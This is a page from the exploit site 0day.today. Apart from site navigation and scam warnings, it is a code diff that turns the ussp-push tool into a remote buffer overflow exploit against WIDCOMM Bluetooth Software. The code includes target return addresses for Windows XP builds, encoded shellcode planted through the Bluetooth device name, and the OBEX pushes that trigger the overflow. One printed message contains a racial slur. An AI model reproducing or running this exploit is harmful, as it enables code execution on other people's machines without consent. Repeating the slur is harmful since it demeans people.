0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WIDCOMM Bluetooth Software < 3.0 Remote Buffer Overflow Exploit
[===============================================================
WIDCOMM Bluetooth Software < 3.0 Remote Buffer Overflow Exploit
===============================================================
--- ussp-push-0.4/obex_main.c 2005-06-01 18:32:59.000000000 -0400
+++ ussp-push-0.4-kf/obex_main.c 2005-12-03 11:49:32.000000000 -0500
@@ -1,4 +1,10 @@
/*
+ http://www.digitalmunition.com
+ Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest.
+ http://www.pentest.co.uk/documents/ptl-2004-03.html
+
+*/
+/*
* UNrooted.net example code
*
* Most of these functions are just rips from the Affix Bluetooth project OBEX
@@ -62,7 +68,10 @@
#include "obex_socket.h"
-#define UPUSH_APPNAME "ussp-push v0.4"
+#include <bluetooth/hci.h>
+#include <bluetooth/hci_lib.h>
+
+#define UPUSH_APPNAME "BluePIMped v0.1"
#define BT_SERVICE "OBEX"
#define OBEX_PUSH 5
@@ -316,6 +325,9 @@
switch (event) {
case OBEX_EV_PROGRESS:
printf("Made some progress...\n");
+ sleep(3);
+ printf("Peace nigga...\n");
+ exit(0);
break;
case OBEX_EV_ABORT:
@@ -382,9 +394,7 @@
name = remote;
name_len = (strlen(name)+1)<<1;
- if( (namebuf = g_malloc(name_len)) ) {
- OBEX_CharToUnicode(namebuf, name, name_len);
- }
+ namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode.
buf = easy_readfile(path, &file_size);
if(buf == NULL) {
@@ -424,6 +434,24 @@
return err;
}
+static void set_device_name(int ctl, int hdev, char *opt) // Johnh as usual...
+{
+ int s = hci_open_dev(hdev);
+
+ if (s < 0) {
+ fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ if (opt) {
+ if (hci_write_local_name(s, opt, 2000) < 0) {
+ fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ }
+
+}
/*
* That's all there is to it. With it all setup like this all I have to do
@@ -434,19 +462,87 @@
int main( int argc, char **argv )
{
- if ( argc != 4 ) {
- printf("%s\n\n"
- "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"
- "\tDEVICE = RFCOMM TTY device file\n"
- "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"
- "\tLFILE = Local file path\n"
- "\tRFILE = Remote file name\n\n",
- UPUSH_APPNAME, argv[0]);
+/*
+ The following may be necessary in hcid.conf to prevent the pairing prompts.
+
+ # Authentication and Encryption (Security Mode 3)
+ auth disable;
+ encrypt disable;
+*/
+
+ struct
+ {
+ char *os;
+ u_long ret;
+ }
+ targets[] =
+ {
+ { "[ XP Pro SP0 - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
+ { "[ XP Pro SP0 - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
+ { "[ XP Pro SP0 - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
+ { "[ XP Pro SP1a - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
+ { "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
+ { "[ Crash ]", 0x41424344 },
+ }, v;
+
+ if ( argc != 3 ) {
+ printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET = Target number\n",UPUSH_APPNAME,argv[0]);
+ printf("Types:\n");
+ int i;
+ for(i = 0; i < sizeof(targets)/sizeof(v); i++)
+ printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
+
return( -1 );
}
- printf( "pushing file %s\n", argv[2] );
- if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
+ /* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
+ /* Size=224 Encoder=ShikataGaNai http://metasploit.com */
+ /* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */
+ /* this still crashes the BTStackServer.exe... but oh well */
+ unsigned char scode[] =
+ "\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"
+ "\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"
+ "\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"
+ "\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"
+ "\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"
+ "\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"
+ "\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"
+ "\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"
+ "\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"
+ "\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"
+ "\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"
+ "\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"
+ "\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"
+ "\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";
+
+ set_device_name(0,0,scode);
+ //printf("RENAME DONE: SET NEW NAME TO %s\n",scode);
+ //printf( "pushing file.\n");
+
+ char buf[3000];
+ memset(buf,'\0',sizeof(buf));
+ memset(buf,'Z',3); // Sometimes u need 3 z's
+
+ int type = atoi(argv[2]);
+ if(type)
+ {
+ printf("[-] Selected target:\n");
+ printf(" %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);
+ }
+
+ int x;
+ for(x=0; x<=122; x=x+1)
+ {
+ memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
+ }
+ // Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\<bdaddr>\Name with shellcode
+ if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
+ printf( "error\n" );
+ return( -1 );
+ }
+ printf("\nsleeping 3 seconds before triggering the shellcode\n");
+ sleep(3);
+ if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
printf( "error\n" );
return( -1 );
}
# 0day.today [2024-11-16] #